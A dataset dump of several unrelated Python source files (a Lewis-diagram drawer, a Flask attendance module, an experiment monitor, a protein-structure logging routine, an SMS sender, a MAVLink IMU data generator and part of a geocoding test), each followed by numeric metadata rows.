elif 9 <= self.element["ypos"] <= 10:
return 2
elif 2 <= self.element["xpos"] <= 12:
return 2
else:
return self.element["xpos"] % 10
# Updates the formal charge of the atom.
def update_formal_charge(self):
self.formal_charge = self.expected_ve - self.loose_ve - self.sigma_bonds - self.pi_bonds
# Updates the total number of valence electrons, including shared ones.
def update_total_ve(self):
self.total_ve = self.loose_ve + 2 * (self.sigma_bonds + self.pi_bonds)
# Returns essential information about the atom as a string.
def __str__(self):
return (self.element["name"] + ": " + str(self.loose_ve) + " loose, "
+ str(self.sigma_bonds) + " sigma, " + str(self.pi_bonds) + " pi")
# Retrieves the element corresponding to the given symbol.
def get_element(symbol):
for element in data["elements"]:
if element["symbol"] == symbol:
return element
print("Error: Element '" + symbol + "' not found.\n\n\n")
return False
# Parses through the inputted formula, splitting it into elements and frequencies.
def parse(form):
i = 1
while i < len(form) and not(ord('A') <= ord(form[i]) <= ord('Z')):
i += 1
j = i - 1
while j >= 0 and ord('0') <= ord(form[j]) <= ord('9'):
j -= 1
if j < 0:
print("Error: The formula cannot start with a number.\n\n\n")
sys.exit()
symbol_part = form[:j+1]
number_part = form[j+1:i]
rest = form[i:]
ele = get_element(symbol_part)
if number_part == "":
number = 1
else:
number = int(number_part)
element_frequency[symbol_part] = number
for i in range(number):
atoms.append(Atom(symbol_part))
if len(rest) > 0:
parse(rest)
# Prints a "not supported" message and quits the program.
def noSupport():
print("Sorry, this molecule is not supported yet.\n\n\n")
sys.exit()
# Checks if the molecule is supported.
def check():
if len(element_frequency) != 2:
noSupport()
symb1 = list(element_frequency)[0]
symb2 = list(element_frequency)[1]
global center
global outer
if symb1 == "H":
center = symb2
outer = symb1
elif symb2 == "H":
center = symb1
outer = symb2
elif get_element(symb1)["electronegativity_pauling"] < get_element(symb2)["electronegativity_pauling"]:
center = symb1
outer = symb2
elif get_element(symb1)["electronegativity_pauling"] > get_element(symb2)["electronegativity_pauling"]:
center = symb2
outer = symb1
else:
noSupport()
if element_frequency[center] != 1:
noSupport()
# Bonds two atoms together; updates in the object and the data structure.
def bond(atom1, atom2, type):
bonds.append((atom1, atom2, type))
if (type == "sigma"):
atom1.sigma_bonds += 1
atom2.sigma_bonds += 1
if (type == "pi"):
atom1.pi_bonds += 1
atom2.pi_bonds += 1
# Distributes the valence electrons as loose ones or through bonds.
def distribute():
total_ve = 0
for a in atoms:
total_ve += a.expected_ve
total_ve -= charge
left_ve = total_ve
global centerAtom
centerAtom = -1
global outerAtoms
outerAtoms = []
for a in atoms:
if a.symbol == center:
centerAtom = a
elif a.symbol == outer:
outerAtoms.append(a)
for o in outerAtoms:
bond(centerAtom, o, "sigma")
left_ve -= 2
want_ve = -1
if outer == "H" or outer == "He":
want_ve = 0
else:
want_ve = 6
if left_ve // len(outerAtoms) >= want_ve:
for o in outerAtoms:
o.loose_ve += want_ve
left_ve -= want_ve
if left_ve >= 0:
centerAtom.loose_ve += left_ve
else:
noSupport()
# Draws the lewis diagram using matplotlib.
def draw_lewis():
centerAtom.lewis_x = 0
centerAtom.lewis_y = 0
plt.style.use('_mpl-gallery')
fig, ax = plt.subplots()
fig.suptitle(formula, fontsize=14, fontweight='bold')
ax.text(0, 0, centerAtom.symbol, verticalalignment='center', horizontalalignment='center')
for i in range(len(outerAtoms)):
o = outerAtoms[i]
o.lewis_x = math.cos(2 * i * math.pi / len(outerAtoms))
o.lewis_y = math.sin(2 * i * math.pi / len(outerAtoms))
ax.text(o.lewis_x, o.lewis_y, o.symbol, verticalalignment='center', horizontalalignment='center')
for b in bonds:
x1 = (2 * b[0].lewis_x + b[1].lewis_x) / 3
x2 = (b[0].lewis_x + 2 * b[1].lewis_x) / 3
y1 = (2 * b[0].lewis_y + b[1].lewis_y) / 3
y2 = (b[0].lewis_y + 2 * b[1].lewis_y) / 3
plt.plot([x1, x2], [y1, y2], color='gray')
for a in atoms:
x_shift = 0
y_shift = 0
for i in range(a.loose_ve):
if 0 <= i <= 1:
x_shift = -0.2
elif 2 <= i <= 3:
y_shift = -0.2
elif 4 <= i <= 5:
x_shift = 0.2
elif 6 <= i <= 7:
y_shift = 0.2
if i == 0 or i == 5:
y_shift = 0.05
elif i == 1 or i == 4:
y_shift = -0.05
elif i == 2 or i == 7:
x_shift = -0.05
elif i == 3 or i == 6:
x_shift = 0.05
ax.scatter(x = a.lewis_x + x_shift, y = a.lewis_y + y_shift + 0.03,
s = 4, color='black')
axes = plt.gca()
axes.set_aspect(1)
plt.xlim([-1.75, 1.75])
plt.ylim([-1.7, 1.8])
axes.axes.xaxis.set_visible(False)
axes.axes.yaxis.set_visible(False)
plt.show()
parse(formula)
check()
distribute()
print(element_frequency)
for a in atoms:
print(a)
draw_lewis()
print("\n\n\n")
| 30.995851
| 107
| 0.58822
| 1,064
| 7,470
| 4.016917
| 0.225564
| 0.005147
| 0.009827
| 0.010295
| 0.142957
| 0.118858
| 0.049602
| 0.049602
| 0.049602
| 0.049602
| 0
| 0.030967
| 0.291031
| 7,470
| 240
| 108
| 31.125
| 0.776057
| 0.148728
| 0
| 0.147208
| 0
| 0
| 0.09378
| 0.019735
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060914
| false
| 0
| 0.020305
| 0.005076
| 0.121827
| 0.035533
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e7b5a8abbdd10976c1ff71d253777d5ecde531
| 9,185
|
py
|
Python
|
app/transaction/attendence.py
|
rrsk/hiwayPay
|
c84b7581475164751f64540a521b803bdf08a9fb
|
[
"MIT"
] | 31
|
2020-07-01T06:40:16.000Z
|
2022-03-30T18:49:02.000Z
|
app/transaction/attendence.py
|
rrsk/hiwayPay
|
c84b7581475164751f64540a521b803bdf08a9fb
|
[
"MIT"
] | 2
|
2020-11-02T06:21:23.000Z
|
2021-06-02T00:31:06.000Z
|
app/transaction/attendence.py
|
rrsk/hiwayPay
|
c84b7581475164751f64540a521b803bdf08a9fb
|
[
"MIT"
] | 13
|
2020-07-02T07:06:05.000Z
|
2022-03-15T11:34:41.000Z
|
from flask import Blueprint
from flask import render_template, redirect, url_for, request, session, jsonify
from flask_login import login_user, logout_user, current_user
from app.transaction import bp
from app.transaction.model_att import Attendence, AttendenceSchema , CompanySchema
from app.employee.model import Employee
from app.master.model import Company
from app import db, ma
from datetime import datetime
import json
@bp.route('/attendence/', methods=['GET'])
def show_attendence():
return render_template('transaction/attendence.html')
@bp.route('/attendence/get', methods=['POST'])
def get_attendence():
if request.method == "POST":
payload = request.json
if payload != None:
payload_date = payload['date'].split('-')
payload_date = datetime(
int(payload_date[0]), int(payload_date[1]), int(1))
company = payload['company']
data = Attendence.query.filter(
Attendence.company.any(Company.id == int(company)), Attendence.date == payload_date).all()
data_schema = AttendenceSchema(many=True)
json_data = data_schema.dumps(data)
return jsonify(json_data)
else:
            return jsonify({'message': 'Empty Data Received'})
else:
return jsonify({'message': 'Invalid HTTP Request , use POST.'})
@bp.route('/attendence/employee/<emp_id>', methods=['GET'])
def emp_attendence(emp_id):
if request.method == "GET":
year = datetime(datetime.now().year, 1, 1)
data = Attendence.query.filter(
Attendence.employee.any(Employee.id == int(emp_id)), Attendence.date >= year).all()
day_att = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
early_att = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
late_att = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
for item in data:
index = int(datetime.strptime(
str(item.date).split(" ")[0], "%Y-%m-%d").month)-1
day_att[index] = item.daysatt
early_att[index] = item.earlygoing
late_att[index] = item.latecomin
json_data = json.dumps(
{'day_att': day_att, 'early_att': early_att, 'late_att': late_att})
return jsonify(json_data)
else:
return jsonify({'message': 'Invalid HTTP request method.'})
# @bp.route('/attendence/employee/data/<emp_id>', methods=['POST'])
# def emp_attendence_data(emp_id):
# if request.method == "POST":
# data = Attendence.query.filter(
# Attendence.employee.any(Employee.id == int(emp_id))).all()
# # data_schema = AttendenceSchema(many=True)
# today = datetime.now()
# today.year()
# return jsonify(json_data)
# else:
# return jsonify({'message': 'Invalid HTTP request method.'})
@bp.route('/attendence/summary/latecomin', methods=['POST'])
def summary_late_attendence():
if request.method == "POST":
# Setting fiscal Year
today = datetime.now()
payload_date = datetime(
int(today.year), int(1), int(1))
payload_date_end = datetime(
int(today.year + 1), int(1), int(1))
all_emps = Employee.query.filter(Employee.flag == 0).all()
payload = {}
payload_late = {}
payload_early = {}
for emp in all_emps:
data = Attendence.query.filter(Attendence.employee.any(Employee.id == int(emp.id)),
Attendence.date >= payload_date, Attendence.date <= payload_date_end).all()
day_att = 0
early_att = 0
late_att = 0
for item in data:
day_att += item.daysatt
early_att += item.earlygoing
late_att += item.latecomin
company_schema = CompanySchema(many=True)
payload_data = {'name': emp.name, 'company': company_schema.dumps(emp.company), 'day_att': day_att, 'early_att': early_att, 'late_att': late_att}
payload_late.update({emp.id: payload_data})
payload_late = sorted(payload_late.items(), key = lambda x : x[1]['late_att'])[::-1][:5]
payload_early = sorted(payload_early.items(), key = lambda x : x[1]['early_att'])[::-1][:5]
payload['early'] = payload_early
payload['late'] = payload_late
return jsonify(payload)
else:
return jsonify({'message': 'Invalid HTTP request method.'})
@bp.route('/attendence/save', methods = ['POST'])
def save_attendence():
if request.method == 'POST':
        payload = request.json
        if payload is not None:
            payload_data = payload['data']
            payload_date = payload['date'].split('-')
            payload_date = datetime(
                int(payload_date[0]), int(payload_date[1]), int(1))
# Date checks to be done
table_columns=(
'daysatt',
'latecomin',
'earlygoing'
)
try:
                # Need update check inside
for item in payload_data:
new_data=Attendence()
emp=Employee.query.filter_by(
id = int(item['id'])).first()
company=Company.query.filter_by(
id = int(payload['company'])).first()
new_data.company.append(company)
new_data.employee.append(emp)
for field in table_columns:
val=item[field]
if val == '' or val is None:
continue
setattr(new_data, field, val)
setattr(new_data, 'date', payload_date)
if 'tdsval' in item.keys():
if item['tdsval'] != "":
setattr(new_data, 'tds', item['tdsval'])
if 'other_deduction' in item.keys():
val=item['other_deduction']
if val == '' or val is None:
continue
setattr(new_data, 'other_deduction',
item['other_deduction'])
if 'esival' in item.keys():
if item['esival'] != "":
setattr(new_data, 'esi', item['esival'])
if 'pfval' in item.keys():
if item['pfval'] != "":
setattr(new_data, 'pf', item['pfval'])
db.session.add(new_data)
db.session.commit()
return jsonify({'success': 'Data Added'})
except Exception as e:
db.session.rollback()
return jsonify({'message': 'Something went wrong'})
return jsonify({'message': 'Something went wrong'})
else:
return jsonify({'message': 'Empty data.'})
@bp.route('/attendence/update', methods = ['POST'])
def update_attendence():
if request.method == 'POST':
payload=request.json
if payload != None:
table_columns=(
'daysatt',
'latecomin',
'earlygoing'
)
try:
# Need Update check inside
for item in payload:
saved_att = db.session.query(Attendence).filter_by(
id=int(item['id'])).first()
for field in table_columns:
val = item[field]
if val == '' or val is None:
continue
setattr(saved_att, field, val)
if 'tdsval' in item.keys():
val = item['tdsval']
if val == '' or val is None:
continue
setattr(saved_att, 'tds', item['tdsval'])
if 'other_deduction' in item.keys():
val = item['other_deduction']
if val == '' or val is None:
continue
setattr(saved_att, 'other_deduction',
item['other_deduction'])
if 'esival' in item.keys():
val = item['esival']
if val == '' or val is None:
continue
setattr(saved_att, 'esi', item['esival'])
if 'pfval' in item.keys():
val = item['pfval']
if val == '' or val is None:
continue
setattr(saved_att, 'pf', item['pfval'])
db.session.commit()
return jsonify({'success': 'Data Updated'})
except Exception as e:
print(str(e))
db.session.rollback()
return jsonify({'message': 'Something went wrong'})
return jsonify({'message': 'Something went wrong'})
else:
return jsonify({'message': 'Empty data.'})
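A hypothetical client payload for /attendence/save, matching the fields the handler reads; the base URL, ids and values are made up.
import requests

payload = {
    'date': '2020-07-01',
    'company': '1',
    'data': [
        {'id': '7', 'daysatt': 26, 'latecomin': 2, 'earlygoing': 1,
         'tdsval': '150'},
    ],
}
requests.post('http://localhost:5000/attendence/save', json=payload)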
| 38.919492
| 157
| 0.507349
| 968
| 9,185
| 4.68905
| 0.14876
| 0.014541
| 0.019828
| 0.023794
| 0.567526
| 0.49306
| 0.467284
| 0.430271
| 0.384666
| 0.384666
| 0
| 0.010528
| 0.369189
| 9,185
| 235
| 158
| 39.085106
| 0.772868
| 0.05988
| 0
| 0.459459
| 0
| 0
| 0.106985
| 0.009863
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032432
| false
| 0
| 0.054054
| 0.005405
| 0.172973
| 0.010811
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9e83e673a43a955f85b17deeccd1c24bc0579dc
| 3,385
|
py
|
Python
|
examples/monitor.py
|
seba-1511/randopt
|
74cefcc734c6a38418151025b0a4d8b6cb41eb14
|
[
"Apache-2.0"
] | 115
|
2016-11-21T06:44:19.000Z
|
2022-01-21T22:21:27.000Z
|
examples/monitor.py
|
seba-1511/randopt
|
74cefcc734c6a38418151025b0a4d8b6cb41eb14
|
[
"Apache-2.0"
] | 26
|
2016-11-21T07:31:37.000Z
|
2019-01-16T14:13:23.000Z
|
examples/monitor.py
|
seba-1511/randopt
|
74cefcc734c6a38418151025b0a4d8b6cb41eb14
|
[
"Apache-2.0"
] | 9
|
2018-04-02T19:54:20.000Z
|
2020-02-11T09:12:41.000Z
|
#!/usr/bin/env python3
"""
Usage:
python monitor.py randopt_results/simple_example/
"""
import sys
import os
import time
import curses
import randopt as ro
USE_MPL = True
USE_CURSES = True
try:
from terminaltables import AsciiTable, SingleTable
except ImportError:
    raise ImportError('run pip install terminaltables')
try:
import matplotlib.pyplot as plt
except ImportError:
    print('matplotlib not found, live plotting disabled.')
USE_MPL = False
def table_statistics(counts, timings, minimums, maximums, name='Experiment'):
minimum = "{0:.3f}".format(minimums[-1])
maximum = "{0:.3f}".format(maximums[-1])
timing = "{0:.2f}".format(timings[-1])
data = [
['Results Count', 'Minimum Result', 'Maximum Result', 'Time Elapsed'],
[counts[-1], minimum, maximum, timing],
]
if USE_CURSES:
table = AsciiTable(data, name)
else:
table = SingleTable(data, name)
table.inner_heading_row_border = True
table.inner_row_border = True
table.inner_column_border = True
table.outer_border = False
table.justify_columns = {0: 'center', 1: 'center', 2: 'center', 3: 'center'}
return table.table
def plot_statistics(counts, timings, minimums, maximums, name='Experiment'):
plt.ion()
plt.clf()
# Min subplot
plt.subplot(211)
plt.title('Experiment ' + name + ' Statistics')
plt.plot(counts, minimums, label='Minimum')
plt.legend()
plt.ylabel('Result')
    # Max subplot
plt.subplot(212)
plt.plot(counts, maximums, label='Maximum')
plt.legend()
plt.xlabel('Number of experiments')
plt.ylabel('Result')
# This renders the figure
plt.pause(0.05)
if __name__ == '__main__':
exp_path = sys.argv[1]
if exp_path[-1] == '/':
exp_path = exp_path[:-1]
exp_dir, exp_name = os.path.split(exp_path)
exp = ro.Experiment(exp_name, directory=exp_dir)
# init interactive display
if USE_CURSES:
screen = curses.initscr()
curses.noecho()
curses.cbreak()
curses.curs_set(False)
screen.keypad(True)
start_time = time.time()
timings = []
minimums = []
maximums = []
counts = []
try:
while True:
minimums.append(exp.minimum().result)
maximums.append(exp.maximum().result)
counts.append(exp.count())
timings.append(time.time() - start_time)
if USE_MPL:
plot_statistics(counts, timings, minimums, maximums, exp_name)
table = table_statistics(
counts, timings, minimums, maximums, exp_name)
if USE_CURSES:
screen.addstr(0, 0, 'Experiment ' + exp_name + ' Statistics')
for i, line in enumerate(table.split('\n')):
line = line.replace('-', u'\u2500')
line = line.replace('|', u'\u2502')
line = line.replace('+', u'\u253c')
screen.addstr(2 + i, 0, line)
screen.refresh()
else:
print(table)
if USE_MPL:
plt.pause(5)
else:
time.sleep(5)
finally:
if USE_CURSES:
curses.echo()
curses.nocbreak()
screen.keypad(True)
curses.endwin()
| 27.08
| 80
| 0.576662
| 386
| 3,385
| 4.935233
| 0.354922
| 0.015748
| 0.060367
| 0.065092
| 0.165354
| 0.113386
| 0.103937
| 0
| 0
| 0
| 0
| 0.018487
| 0.296898
| 3,385
| 124
| 81
| 27.298387
| 0.781933
| 0.05613
| 0
| 0.210526
| 0
| 0
| 0.098994
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021053
| false
| 0
| 0.073684
| 0
| 0.105263
| 0.021053
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9ec67e739da8431aa5c39d649a7e5eb15794f15
| 6,973
|
py
|
Python
|
LOG.py
|
viniciusdc/Protein_structure_SPGm
|
861672071f2a47b54e4624fc1f69cf3fff0ff356
|
[
"MIT"
] | null | null | null |
LOG.py
|
viniciusdc/Protein_structure_SPGm
|
861672071f2a47b54e4624fc1f69cf3fff0ff356
|
[
"MIT"
] | null | null | null |
LOG.py
|
viniciusdc/Protein_structure_SPGm
|
861672071f2a47b54e4624fc1f69cf3fff0ff356
|
[
"MIT"
] | null | null | null |
from Methods.utils import rmsd, mde
import logging
import json
def os_display_call(test_path, main, data, multistart=False):
(
filename,
num_atom_init,
total_atoms_ord,
m,
prop_dist,
convex,
fo_non_scaled,
fo_scaled,
ops,
) = main
xi, solution, u, v, lb, ub = ops
# Get logger
logger = logging.getLogger('root.spgLOG')
logger.info(
"########################################## INFO ##########################################"
)
logger.info(
f":: Protein: {filename}, Initial atoms number: {num_atom_init}, after re-ordination {total_atoms_ord}."
)
logger.info(f":: Assessed distances: {m} and known distances: {prop_dist}.")
if convex:
logger.info(
f":: Initial objective value for the relaxed problem: {fo_non_scaled:.4e}"
)
logger.info(
f":: Initial objective value for the relaxed problem --scaled {fo_scaled:.4e}"
)
rmsd_i, mde_i = rmsd(xi, solution), mde(xi, u, v, lb, ub)
logger.info(f":: RMSDi = {rmsd_i:<24.2e} MDEi = {mde_i:.2e}")
# -----------------------------------------------------------------------------------
# Multi-start option --Enabled
# -----------------------------------------------------------------------------------
if multistart:
if type(data) != dict:
logger.warning(":: data type object not match with dict structure!")
logger.warning(":: The process was interrupted")
return exit()
logger.info(":: spg results --multi start: True")
logger.info(
":: Iter - bck -- RMSDf ----- MDEf"
" ----- i_val ----- f_val ----- gtd ----- |d| ----- time(s)"
)
sub_log = {}
k = 0
for key in data:
out, elapsed_time, fo = data[key]
x_spg, backtracking, iterations, fun_o, gtd, norm_d = out
# Statistics:
rmsd_f = rmsd(x_spg, solution)
mde_f = mde(x_spg, u, v, lb, ub)
prompt_string = (
f" {iterations:<5}: {backtracking:<6} {rmsd_f:<11.2e} {mde_f:<10.2e} {fo / 2:<11.2e} "
f"{fun_o / 2:<10.2e} {gtd:<10.2e} {norm_d:<10.2e} {elapsed_time:.3f}"
)
sub_log[k] = {"iter": f'{iterations:<7}', "back": f'{backtracking:<6}', "RMDSf": f'{rmsd_f:<11.2e}',
"MDEf": f'{mde_f:<10.2e}', "fun_i": f'{fo / 2:<11.2e}', "fun_f": f'{fun_o / 2:<10.2e}',
"gtd": f'{gtd:<10.2e}', "norm_d": f'{norm_d:<10.2e}', "time": f'{elapsed_time:.3f}'}
logger.info(prompt_string)
k += 1
logger.info(
"############################################################################################"
)
# -----------------------------------------------------------------------------
# Generating output file with statistics:
# -----------------------------------------------------------------------------
static_dict = {"node": f'{filename}', "init_atom_#": f"{num_atom_init}",
"atom_#_re-ordination": f'{total_atoms_ord}',
"assessed_dist": f'{m}', "Know_dist": f'{prop_dist}'}
if convex:
static_dict["convex"] = True
static_dict["init_fun_val_relax"] = f'{fo_non_scaled:.4e}'
static_dict["init_fun_val_relax_k"] = f'{fo_scaled:.4e}'
else:
static_dict["convex"] = False
static_dict["init_fun_val_relax"] = 'N/A'
static_dict["init_fun_val_relax_k"] = 'N/A'
static_dict["RMSDi"] = f'{rmsd_i:<24.2e}'
static_dict["MDEi"] = f'{mde_i:.2e}'
if type(data) != dict:
logger.warning(":: data type object not match with dict structure!\n")
logger.warning(":: The process was interrupted\n")
multistart_list = []
n = len(sub_log.keys())
for i in range(n):
multistart_list.append(sub_log[i])
static_dict["multi-start"] = multistart_list
static_dict["standard"] = False
        static_log = test_path + "\\spg_static_multistart_LOG.txt"
with open(static_log, "w") as f:
json.dump(static_dict, f)
# -----------------------------------------------------------------------------------
# Multi-start --Disable Standard
# -----------------------------------------------------------------------------------
else:
out, elapsed_time, fo = data
x_spg, backtracking, iterations, fun_o, gtd, norm_d = out
# Statistics:
rmsd_f = rmsd(x_spg, solution)
mde_f = mde(x_spg, u, v, lb, ub)
logger.info(":: spg results --multi start: False")
logger.info(
":: Iter - bck -- RMSDf ----- MDEf"
" ----- i_val ----- f_val ----- gtd ----- |d| ----- time(s)"
)
prompt_string = (
f" {iterations:<5}: {backtracking:<6} {rmsd_f:<11.2e} {mde_f:<10.2e} {fo / 2:<11.2e} "
f"{fun_o / 2:<10.2e} {gtd:<10.2e} {norm_d:<10.2e} {elapsed_time:.3f}"
)
logger.info(prompt_string)
logger.info(
"############################################################################################"
)
# -----------------------------------------------------------------------------
# Generating output file with statistics:
# -----------------------------------------------------------------------------
        static_log = test_path + "\\spg_static_standard_LOG.txt"
static_dict = {"node": f'{filename}', "init_atom_#": f"{num_atom_init}",
"atom_#_re-ordination": f'{total_atoms_ord}',
"assessed_dist": f'{m}', "Know_dist": f'{prop_dist}'}
if convex:
static_dict["convex"] = True
static_dict["init_fun_val_relax"] = f'{fo_non_scaled:.4e}'
static_dict["init_fun_val_relax_k"] = f'{fo_scaled:.4e}'
else:
static_dict["convex"] = False
static_dict["init_fun_val_relax"] = 'N/A'
static_dict["init_fun_val_relax_k"] = 'N/A'
static_dict["RMSDi"] = f'{rmsd_i:<24.2e}'
static_dict["MDEi"] = f'{mde_i:.2e}'
static_dict["multi-start"] = False
static_dict["standard"] = {"iter": f'{iterations:<7}', "back": f'{backtracking:<6}',
"RMDSf": f'{rmsd_f:<11.2e}',
"MDEf": f'{mde_f:<10.2e}', "fun_i": f'{fo / 2:<11.2e}',
"fun_f": f'{fun_o / 2:<10.2e}',
"gtd": f'{gtd:<10.2e}', "norm_d": f'{norm_d:<10.2e}',
"time": f'{elapsed_time:.3f}'}
with open(static_log, "w") as file:
json.dump(static_dict, file)
| 43.855346
| 113
| 0.443711
| 777
| 6,973
| 3.75547
| 0.191763
| 0.082248
| 0.038382
| 0.046607
| 0.701851
| 0.688143
| 0.623029
| 0.591501
| 0.559287
| 0.559287
| 0
| 0.022436
| 0.284096
| 6,973
| 158
| 114
| 44.132911
| 0.562099
| 0.118027
| 0
| 0.446154
| 0
| 0.030769
| 0.385719
| 0.053472
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007692
| false
| 0
| 0.038462
| 0
| 0.053846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9f038d1fb5d0607ea396a1c5e9bb4c50b48b589
| 449
|
py
|
Python
|
src/services/sms.py
|
HutRubberDuck/super-mini-divar
|
191c2f9a412ef879b52f4a71e0fe74743138ab13
|
[
"Apache-2.0"
] | null | null | null |
src/services/sms.py
|
HutRubberDuck/super-mini-divar
|
191c2f9a412ef879b52f4a71e0fe74743138ab13
|
[
"Apache-2.0"
] | null | null | null |
src/services/sms.py
|
HutRubberDuck/super-mini-divar
|
191c2f9a412ef879b52f4a71e0fe74743138ab13
|
[
"Apache-2.0"
] | null | null | null |
from kavenegar import KavenegarAPI, APIException, HTTPException
from src.core.settings import OTP_API_KEY
def send_sms(phone, message):
try:
api = KavenegarAPI(OTP_API_KEY)
response = api.sms_send({
'sender': '10008663',
'receptor': phone,
'message': message,
})
print(response)
except APIException as e:
print(e)
except HTTPException as e:
print(e)
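A minimal call sketch; the receptor number and message text are made-up examples in Kavenegar's local numbering format.
send_sms('09123456789', 'Your verification code is 1234')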
| 23.631579
| 63
| 0.605791
| 49
| 449
| 5.428571
| 0.530612
| 0.045113
| 0.067669
| 0.067669
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.305122
| 449
| 18
| 64
| 24.944444
| 0.826923
| 0
| 0
| 0.133333
| 0
| 0
| 0.064588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.2
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9f2d64566db5376ed467678309c5e2282462dda
| 923
|
py
|
Python
|
src/ground/drainbow_mcc/src/drainbow_mcc/emitter/imu.py
|
granum-space/cansat-2017-2018
|
4d9db6f2d55c726e11abbb60fd436ec3eafc2373
|
[
"MIT"
] | null | null | null |
src/ground/drainbow_mcc/src/drainbow_mcc/emitter/imu.py
|
granum-space/cansat-2017-2018
|
4d9db6f2d55c726e11abbb60fd436ec3eafc2373
|
[
"MIT"
] | 9
|
2017-10-31T19:20:05.000Z
|
2018-06-17T19:08:52.000Z
|
src/ground/drainbow_mcc/src/drainbow_mcc/emitter/imu.py
|
granum-space/cansat-2018
|
4d9db6f2d55c726e11abbb60fd436ec3eafc2373
|
[
"MIT"
] | 1
|
2018-06-12T11:30:10.000Z
|
2018-06-12T11:30:10.000Z
|
import random
import logging
import time
from datetime import timedelta
from pymavlink import mavutil
_log = logging.getLogger(__name__)
def now():
return int(round(time.time()*1000))
def random_scaled_imu_test(url: str, pause: timedelta):
connection = mavutil.mavlink_connection(url)
mav = connection.mav
_log.info("Запускаю генерацию случайных данных БИНС")
_log.info("параметры: %s, %s" % (url, pause))
boot_time = now()
datagen = lambda: int(round(random.uniform(0, 1)*9.8*3))
while True:
msg = mav.scaled_mpu6000_encode(
time_boot_ms=now() - boot_time,
xacc=datagen(),
yacc=datagen(),
zacc=datagen(),
xgyro=datagen(),
ygyro=datagen(),
zgyro=datagen(),
temperature=datagen(),
)
_log.debug(msg)
mav.send(msg)
time.sleep(pause.total_seconds())
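A hypothetical invocation, pointing the generator at a local UDP sink with a one-second cadence; the endpoint string is an assumption, not part of the module.
if __name__ == '__main__':
    random_scaled_imu_test('udpout:127.0.0.1:14550', timedelta(seconds=1))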
| 23.666667
| 60
| 0.612134
| 109
| 923
| 5.009174
| 0.568807
| 0.029304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019231
| 0.267606
| 923
| 38
| 61
| 24.289474
| 0.788462
| 0
| 0
| 0
| 0
| 0
| 0.061822
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.172414
| 0.034483
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9f4af671dfa98273bbb6368b1d6afc8208adaae
| 12,548
|
py
|
Python
|
tests/test_locator.py
|
somnathrakshit/geograpy3
|
8a247cc2b164cf48b5ce4e7f9349adfef39e7ea4
|
[
"Apache-2.0"
] | 53
|
2020-09-09T06:58:29.000Z
|
2022-03-08T19:16:12.000Z
|
tests/test_locator.py
|
somnathrakshit/geograpy3
|
8a247cc2b164cf48b5ce4e7f9349adfef39e7ea4
|
[
"Apache-2.0"
] | 51
|
2020-09-09T09:31:27.000Z
|
2022-01-17T07:12:27.000Z
|
tests/test_locator.py
|
somnathrakshit/geograpy3
|
8a247cc2b164cf48b5ce4e7f9349adfef39e7ea4
|
[
"Apache-2.0"
] | 9
|
2020-09-09T09:13:03.000Z
|
2021-12-14T11:04:34.000Z
|
'''
Created on 2020-09-19
@author: wf
'''
import os.path
import tempfile
import unittest
from pathlib import Path
from lodstorage.storageconfig import StorageConfig
import geograpy
import getpass
from geograpy.locator import Locator, City,CountryManager, Location, LocationContext
from collections import Counter
from lodstorage.uml import UML
import re
from tests.basetest import Geograpy3Test
class TestLocator(Geograpy3Test):
'''
test the Locator class from the location module
'''
def lookupQuery(self,viewName,whereClause):
loc=Locator.getInstance()
queryString=f"SELECT * FROM {viewName} where {whereClause} AND pop is not NULL ORDER by pop desc"
lookupRecords=loc.sqlDB.query(queryString)
return lookupRecords
def checkExpected(self,lod,expected):
emap={}
found={}
for key,value in expected:
emap[key]=value
for record in lod:
name=record["name"]
pop=record["pop"]
if name in emap and pop> emap[name]:
found[name]=record
if self.debug:
print(f"{name}:{pop:.0f}")
self.assertEqual(len(found),len(emap))
def testHasViews(self):
'''
test that the views are available
'''
loc=Locator.getInstance()
viewsMap=loc.sqlDB.getTableDict(tableType="view")
